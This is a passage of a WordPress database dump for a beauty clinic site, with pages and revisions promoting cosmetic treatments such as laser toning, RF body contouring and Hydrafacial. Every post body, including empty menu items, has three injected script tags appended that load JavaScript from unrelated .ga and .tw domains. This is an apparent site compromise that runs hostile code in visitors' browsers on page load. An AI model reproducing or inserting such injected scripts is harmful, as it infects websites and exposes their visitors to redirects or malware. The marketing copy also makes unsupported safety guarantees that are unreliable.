mauticform-page-1\" data-mautic-form-page=\"1\">\r\n<div id=\"mauticform_subscriber_email\" class=\"mauticform-row mauticform-email mauticform-field-1 mauticform-required form-group\" data-validate=\"email\" data-validation-type=\"email\"><label id=\"mauticform_label_subscriber_email\" class=\"mauticform-label\" for=\"mauticform_input_subscriber_email\">Newsletter</label></div>\r\n</div>\r\n</div>\r\n</form></div>\r\n</div>\r\n</footer><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Laser Toning','','publish','closed','closed','','aesthetic-solutions-2-7','','','2017-12-27 14:07:53','2017-12-27 14:07:53','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6390',0,'page','',0),(6391,1,'2017-12-27 14:07:53','2017-12-27 14:07:53','<section id=\"main\">\r\n<div class=\"base-content\"><section class=\"page-content page-service\">\r\n<div class=\"container\">\r\n<div class=\"col-sm-7 col-md-8\">\r\n<div class=\"area-content\">\r\n\r\nNo more freckles, macules, and eye bags that can ruin Your face appearance. They are caused by under-eye pigmentation that is developed under the skin by factors such as UV Tanning, dryness of skin and makeup. To reduce the damages, it is necessary to speed up the skin cell turnover so as to increase the elimination of melanin deposits and prevent the formation of more deposits. And this unique treatment can help You to fix the damages on Your face.\r\n\r\nLaser Toning uses the laser energy to reduce visible pigmentation by breaking down melanin molecules naturally, allowing your immune system to remove them. This treatment has additional benefits in terms of improved skin tone and texture with low risk of adverse effects and of course: no downtime.\r\n\r\nDuring this treatment, You will feel a warm and gentle prickly sensation as the laser beam touches Your skin surface. It takes less than 15 minutes and You will leave with only mild redness that will fade within a few hours.\r\n\r\nA series of treatments are required to obtain the maximum benefit of treatment. Depending on Your skin condition and the advice from our doctors. We will give You a great result to fulfil Your expectations.\r\n\r\n</div>\r\n</div>\r\n<div class=\"col-sm-5 col-md-4\">\r\n<div class=\"area-widget\">\r\n<div class=\"block box\">\r\n<h2></h2>\r\n<div class=\"content\"></div>\r\n</div>\r\n<div class=\"block\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</section><footer id=\"footer\">\r\n<div class=\"container\">\r\n<div id=\"mauticform_wrapper_subscriber\" class=\"mauticform_wrapper col-sm-6\"><form id=\"mauticform_subscriber\" class=\"form-inline\" role=\"form\" action=\"https://medikpro.mautic.net/form/submit?formId=5\" autocomplete=\"false\" method=\"post\" data-mautic-form=\"subscriber\">\r\n<div class=\"mauticform-innerform\">\r\n<div class=\"mauticform-page-wrapper mauticform-page-1\" data-mautic-form-page=\"1\">\r\n<div id=\"mauticform_subscriber_email\" class=\"mauticform-row mauticform-email mauticform-field-1 mauticform-required form-group\" data-validate=\"email\" data-validation-type=\"email\"><label id=\"mauticform_label_subscriber_email\" class=\"mauticform-label\" for=\"mauticform_input_subscriber_email\">Newsletter</label></div>\r\n</div>\r\n</div>\r\n</form></div>\r\n</div>\r\n</footer><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Laser Toning','','inherit','closed','closed','','6390-revision-v1','','','2017-12-27 14:07:53','2017-12-27 14:07:53','',6390,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6390-revision-v1/',0,'revision','',0),(6392,1,'2017-12-27 14:08:19','2017-12-27 14:08:19',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6392','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6392',15,'nav_menu_item','',0),(6393,1,'2017-12-27 14:09:10','2017-12-27 14:09:10','Throw away Your excess pocket of fat and saggy skin with Radio Frequency (RF) Body Contouring. This is Your chance to get the pain-free body treatment that can help You to reduce the appearance of cellulite, firm skin, also it can boosts collagen production and tackle any pesky fatty that won’t budge with exercise. How can?\r\n\r\nAs it named, RF Body Contouring deliver an electrical current via electrodes to the skin layers to selectively heat the skin tissue where the collagen fibres are embedded. When our skin receive a high frequency electrical current the cells in our bodies interpret this as an energy source. It causes an immediate contraction of collagen fibres and fat cells drain then shrink. The effect of this treatment is fat cells are reduced and stubborn cellulite looks a lot less noticeable.\r\n\r\nIf that explanation still difficult to understand, the thing that You should be done is lie back on our treatment bed and relax. Feel the jelly lubricant on Your skin that act as a protective barrier between Your skin and the electrode rod which can get quite hot! Let Your skin being rubbed by the electrode rode, and it will focus on any pesky area that needs extra attention. This treatment is so relaxing that actually can make You easy to fall asleep and just enjoy Your time because that is a sign that You have a good treatment.\r\n\r\nAs the result, You may be able to notice the tightness of Your skin, also results continue to emerge in the days following the treatment to. The skin is remarkably smoother and muscle tone is more visible too. You may have multiple sessions, but, it depends on the results You want and the advice from Your therapist.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Body Contouring','','publish','closed','closed','','aesthetic-solutions-2-8','','','2017-12-27 14:09:10','2017-12-27 14:09:10','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6393',0,'page','',0),(6394,1,'2017-12-27 14:09:10','2017-12-27 14:09:10','Throw away Your excess pocket of fat and saggy skin with Radio Frequency (RF) Body Contouring. This is Your chance to get the pain-free body treatment that can help You to reduce the appearance of cellulite, firm skin, also it can boosts collagen production and tackle any pesky fatty that won’t budge with exercise. How can?\r\n\r\nAs it named, RF Body Contouring deliver an electrical current via electrodes to the skin layers to selectively heat the skin tissue where the collagen fibres are embedded. When our skin receive a high frequency electrical current the cells in our bodies interpret this as an energy source. It causes an immediate contraction of collagen fibres and fat cells drain then shrink. The effect of this treatment is fat cells are reduced and stubborn cellulite looks a lot less noticeable.\r\n\r\nIf that explanation still difficult to understand, the thing that You should be done is lie back on our treatment bed and relax. Feel the jelly lubricant on Your skin that act as a protective barrier between Your skin and the electrode rod which can get quite hot! Let Your skin being rubbed by the electrode rode, and it will focus on any pesky area that needs extra attention. This treatment is so relaxing that actually can make You easy to fall asleep and just enjoy Your time because that is a sign that You have a good treatment.\r\n\r\nAs the result, You may be able to notice the tightness of Your skin, also results continue to emerge in the days following the treatment to. The skin is remarkably smoother and muscle tone is more visible too. You may have multiple sessions, but, it depends on the results You want and the advice from Your therapist.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Body Contouring','','inherit','closed','closed','','6393-revision-v1','','','2017-12-27 14:09:10','2017-12-27 14:09:10','',6393,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6393-revision-v1/',0,'revision','',0),(6395,1,'2017-12-27 14:09:40','2017-12-27 14:09:40',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6395','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6395',16,'nav_menu_item','',0),(6396,1,'2017-12-27 14:11:32','2017-12-27 14:11:32','You may have imperfections on Your body and Stretch Mark should not be one of them! Stretch Mark are not only experienced by pregnant women, they can appear anywhere on Your body if the skin has been stretched. The most common places are the abdomen, breasts, upper arms, thighs and bum.\r\n\r\nStretch mark are caused by a lack of collagen and elastin, also occur when the skin is stretched too far over a very short period of time. It leaving noticeable lines upon the surface of the skin. The lighter the color of the skin, the higher chances of getting visible stretch marks. But now, this is time for You to get back Your confidence because Stretch Mark Laser Reduction will bring You to the new You!\r\n\r\nUsing fractional laser technology, the scar tissue will be heated to a therapeutic temperature to repair and stimulating Your cells to produce new collagen. Stretch Mark Laser Reduction combining the Fractional Radio Frequency and Dermal Stamping to penetrates the deeper layers and resulting in the tighter skin and reduce discoloration.\r\n\r\nStretch Mark Laser Reduction is suitable for:\r\n<ul>\r\n 	<li>Pregnancy stretch mark on the belly, hips, etc</li>\r\n 	<li>Stretch mark from adolescent growth spurts</li>\r\n 	<li>Stretch mark caused by weight gain or weight loss</li>\r\n 	<li>Men and women of all skin types</li>\r\n</ul>\r\nThis treatment is a non-surgical, non-invasive procedure that can improve the appearance of Your skin. The innovative technology used in Stretch Mark Laser Reduction has been brought by a lot of clinical research from professionals and experts around the globe. And proudly, we offer You an easy way to return the smooth skin and the confidence You’ve always wanted.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Stretch Mark Laser Reduction','','publish','closed','closed','','aesthetic-solutions-2-9','','','2017-12-27 14:11:32','2017-12-27 14:11:32','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6396',0,'page','',0),(6397,1,'2017-12-27 14:11:32','2017-12-27 14:11:32','You may have imperfections on Your body and Stretch Mark should not be one of them! Stretch Mark are not only experienced by pregnant women, they can appear anywhere on Your body if the skin has been stretched. The most common places are the abdomen, breasts, upper arms, thighs and bum.\r\n\r\nStretch mark are caused by a lack of collagen and elastin, also occur when the skin is stretched too far over a very short period of time. It leaving noticeable lines upon the surface of the skin. The lighter the color of the skin, the higher chances of getting visible stretch marks. But now, this is time for You to get back Your confidence because Stretch Mark Laser Reduction will bring You to the new You!\r\n\r\nUsing fractional laser technology, the scar tissue will be heated to a therapeutic temperature to repair and stimulating Your cells to produce new collagen. Stretch Mark Laser Reduction combining the Fractional Radio Frequency and Dermal Stamping to penetrates the deeper layers and resulting in the tighter skin and reduce discoloration.\r\n\r\nStretch Mark Laser Reduction is suitable for:\r\n<ul>\r\n 	<li>Pregnancy stretch mark on the belly, hips, etc</li>\r\n 	<li>Stretch mark from adolescent growth spurts</li>\r\n 	<li>Stretch mark caused by weight gain or weight loss</li>\r\n 	<li>Men and women of all skin types</li>\r\n</ul>\r\nThis treatment is a non-surgical, non-invasive procedure that can improve the appearance of Your skin. The innovative technology used in Stretch Mark Laser Reduction has been brought by a lot of clinical research from professionals and experts around the globe. And proudly, we offer You an easy way to return the smooth skin and the confidence You’ve always wanted.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Stretch Mark Laser Reduction','','inherit','closed','closed','','6396-revision-v1','','','2017-12-27 14:11:32','2017-12-27 14:11:32','',6396,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6396-revision-v1/',0,'revision','',0),(6398,1,'2017-12-27 14:12:15','2017-12-27 14:12:15',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6398','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6398',17,'nav_menu_item','',0),(6399,1,'2017-12-27 14:13:04','2017-12-27 14:13:04','Have You ever heard about V-Shape Face? For Asian women, having a face with a V-shape chin seem more feminine and more ideal. The more V shape of the chin, the more eyes will be caught up by Your beauty. No wonder that a lot of people trying to get a V-Shape face in various ways to the most extreme way is perform plastic surgery.\r\n\r\nIs Plastic Surgery really needed? Or is there any safer and right way to obtain the ideal face shape? The answer, of course, there is more safe and appropriate way for You to get an ideal V-Shape Face.\r\n\r\nThe wide opportunity is open for You to get a V-Shape face with one of the treatments on  Medikpro: V-Shape Facial. This treatment can be used for anyone with any skin type. No need to feel the pain, guaranteed to be safe and in a short time, You will get the great appearance with Your new V-Shape Face in Medikpro<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','V Shape Facial','','publish','closed','closed','','aesthetic-solutions-2-10','','','2017-12-27 14:13:04','2017-12-27 14:13:04','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6399',0,'page','',0),(6400,1,'2017-12-27 14:13:04','2017-12-27 14:13:04','Have You ever heard about V-Shape Face? For Asian women, having a face with a V-shape chin seem more feminine and more ideal. The more V shape of the chin, the more eyes will be caught up by Your beauty. No wonder that a lot of people trying to get a V-Shape face in various ways to the most extreme way is perform plastic surgery.\r\n\r\nIs Plastic Surgery really needed? Or is there any safer and right way to obtain the ideal face shape? The answer, of course, there is more safe and appropriate way for You to get an ideal V-Shape Face.\r\n\r\nThe wide opportunity is open for You to get a V-Shape face with one of the treatments on  Medikpro: V-Shape Facial. This treatment can be used for anyone with any skin type. No need to feel the pain, guaranteed to be safe and in a short time, You will get the great appearance with Your new V-Shape Face in Medikpro<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','V Shape Facial','','inherit','closed','closed','','6399-revision-v1','','','2017-12-27 14:13:04','2017-12-27 14:13:04','',6399,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6399-revision-v1/',0,'revision','',0),(6401,1,'2017-12-27 14:13:44','2017-12-27 14:13:44',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6401','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6401',18,'nav_menu_item','',0),(6402,1,'2017-12-27 14:14:38','2017-12-27 14:14:38','Using radio frequency to induce collagen of the skin giving a tighter looking skin<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Face Lifting','','publish','closed','closed','','aesthetic-solutions-3-2','','','2017-12-27 14:14:38','2017-12-27 14:14:38','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6402',0,'page','',0),(6403,1,'2017-12-27 14:14:38','2017-12-27 14:14:38','Using radio frequency to induce collagen of the skin giving a tighter looking skin<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Face Lifting','','inherit','closed','closed','','6402-revision-v1','','','2017-12-27 14:14:38','2017-12-27 14:14:38','',6402,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6402-revision-v1/',0,'revision','',0),(6404,1,'2017-12-27 14:15:11','2017-12-27 14:15:11',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6404','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6404',20,'nav_menu_item','',0),(6405,1,'2017-12-28 02:24:17','2017-12-28 02:24:17','Using radio frequency to induce collagen of the skin giving a tighter looking skin<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Face & Neck Lifting','','publish','closed','closed','','aesthetic-solutions-3-3','','','2017-12-28 02:24:17','2017-12-28 02:24:17','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6405',0,'page','',0),(6406,1,'2017-12-28 02:24:17','2017-12-28 02:24:17','Using radio frequency to induce collagen of the skin giving a tighter looking skin<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Face & Neck Lifting','','inherit','closed','closed','','6405-revision-v1','','','2017-12-28 02:24:17','2017-12-28 02:24:17','',6405,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6405-revision-v1/',0,'revision','',0),(6407,1,'2017-12-28 02:24:44','2017-12-28 02:24:44',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6407','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6407',21,'nav_menu_item','',0),(6408,1,'2017-12-28 02:26:56','2017-12-28 02:26:56','Using radio frequency to induce collagen of the skin giving a tighter looking skin<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Face & Decollete','','publish','closed','closed','','aesthetic-solutions-3-4','','','2017-12-28 02:26:56','2017-12-28 02:26:56','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6408',0,'page','',0),(6409,1,'2017-12-28 02:26:56','2017-12-28 02:26:56','Using radio frequency to induce collagen of the skin giving a tighter looking skin<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','RF Face & Decollete','','inherit','closed','closed','','6408-revision-v1','','','2017-12-28 02:26:56','2017-12-28 02:26:56','',6408,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6408-revision-v1/',0,'revision','',0),(6410,1,'2017-12-28 02:27:21','2017-12-28 02:27:21',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6410','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6410',22,'nav_menu_item','',0),(6411,1,'2017-12-28 02:44:26','2017-12-28 02:44:26','Promotes Skin Tightening, Lifting and Wrinkle Reduction with Pelleve High Frequence Machine<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pelleve Face Lifting','','publish','closed','closed','','aesthetic-solutions-3-5','','','2017-12-28 02:44:26','2017-12-28 02:44:26','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6411',0,'page','',0),(6412,1,'2017-12-28 02:44:26','2017-12-28 02:44:26','Promotes Skin Tightening, Lifting and Wrinkle Reduction with Pelleve High Frequence Machine<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pelleve Face Lifting','','inherit','closed','closed','','6411-revision-v1','','','2017-12-28 02:44:26','2017-12-28 02:44:26','',6411,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6411-revision-v1/',0,'revision','',0),(6413,1,'2017-12-28 02:49:05','2017-12-28 02:49:05','Promotes Skin Tightening, Lifting and Wrinkle Reduction with Pelleve High Frequence Machine<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pelleve Face & Neck Lifting','','publish','closed','closed','','aesthetic-solutions-3-6','','','2017-12-28 02:49:05','2017-12-28 02:49:05','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6413',0,'page','',0),(6414,1,'2017-12-28 02:49:05','2017-12-28 02:49:05','Promotes Skin Tightening, Lifting and Wrinkle Reduction with Pelleve High Frequence Machine<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pelleve Face & Neck Lifting','','inherit','closed','closed','','6413-revision-v1','','','2017-12-28 02:49:05','2017-12-28 02:49:05','',6413,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6413-revision-v1/',0,'revision','',0),(6415,1,'2017-12-28 02:50:01','2017-12-28 02:50:01',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6415','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6415',24,'nav_menu_item','',0),(6416,1,'2017-12-28 02:50:01','2017-12-28 02:50:01',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6416','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6416',23,'nav_menu_item','',0),(6417,1,'2017-12-28 02:55:53','2017-12-28 02:55:53','Promotes Skin Tightening, Lifting and Wrinkle Reduction with Pelleve High Frequence Machine<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pelleve Face, Neck & Decollete Lifting','','publish','closed','closed','','aesthetic-solutions-3-7','','','2017-12-28 02:55:53','2017-12-28 02:55:53','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6417',0,'page','',0),(6418,1,'2017-12-28 02:55:53','2017-12-28 02:55:53','Promotes Skin Tightening, Lifting and Wrinkle Reduction with Pelleve High Frequence Machine<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Pelleve Face, Neck & Decollete Lifting','','inherit','closed','closed','','6417-revision-v1','','','2017-12-28 02:55:53','2017-12-28 02:55:53','',6417,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6417-revision-v1/',0,'revision','',0),(6419,1,'2017-12-28 02:57:28','2017-12-28 02:57:28',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6419','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6419',25,'nav_menu_item','',0),(6420,1,'2017-12-28 02:59:33','2017-12-28 02:59:33','Infuse Grow Factor Serum to your skin to induce the collagen<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Cryo Needle Theraphy','','publish','closed','closed','','aesthetic-solutions-3-8','','','2017-12-28 02:59:33','2017-12-28 02:59:33','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6420',0,'page','',0),(6421,1,'2017-12-28 02:59:33','2017-12-28 02:59:33','Infuse Grow Factor Serum to your skin to induce the collagen<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Cryo Needle Theraphy','','inherit','closed','closed','','6420-revision-v1','','','2017-12-28 02:59:33','2017-12-28 02:59:33','',6420,'http://sandbox.futuremediatrix.com/medikpro/2017/12/28/6420-revision-v1/',0,'revision','',0),(6422,1,'2017-12-28 02:59:59','2017-12-28 02:59:59',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6422','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6422',26,'nav_menu_item','',0),(6423,1,'2017-12-28 03:02:34','2017-12-28 03:02:34','Who do not upset if You have an acne prone skin? Moreover, air pollution increasingly larger. Dust and dirt stick to the face, mixed with oil that adorns our face. If added with the habit to not cleaning the face after doing outside activities, it is already confirmed that Your face becomes a natural target for acne to stays at there.\r\n\r\nAcne must have been acquainted with each person\'s face. But their arrival, would not be welcomed nice right? Various methods are used to throw them away from the face. Start from providing medicine, use a special soap to wash the face, to the most severe to solve acne by force. In the end, acne will spread to all areas of the face if it is carelessly handled.\r\n\r\nThe other way that most people do nowadays are Facial. A bit info, Facial handling can cause pain and also cause many side effects such as irritation, redness, allergies and can even grow more acne. If so, is there any treatment that is painless and also minimal side effects?\r\n\r\nMedikpro introducing Hydrafacial as beauty solutions nowadays that are free of pain because of the tools used in the form of vacuum which soften the dirt that can easily raised without having to suppress. Hydrafacial is the latest beauty technologies using hydra-dermabrasion techniques to cleanse, exfoliate dead skin cells, moisturize and provide a variety of nutrients such as antioxidants, aloe vera and vitamins needed by a conductive skin serum into the skin at the same time.\r\n\r\nHydrafacial has known and be one of most favourite treatment for many Hollywood Celebrity such as Paris Hilton, Beyonce, Eva Mendes, and many more. With Hydrafacial, get the rid of acne sensation that is safe and comfortable for Your face without pain. Make sure You select the proper treatment, because Your face needs to be given the best care.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydrafacial','','publish','closed','closed','','aesthetic-solutions-3-9','','','2017-12-28 03:02:34','2017-12-28 03:02:34','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6423',0,'page','',0),(6424,1,'2017-12-28 03:02:34','2017-12-28 03:02:34','Who do not upset if You have an acne prone skin? Moreover, air pollution increasingly larger. Dust and dirt stick to the face, mixed with oil that adorns our face. If added with the habit to not cleaning the face after doing outside activities, it is already confirmed that Your face becomes a natural target for acne 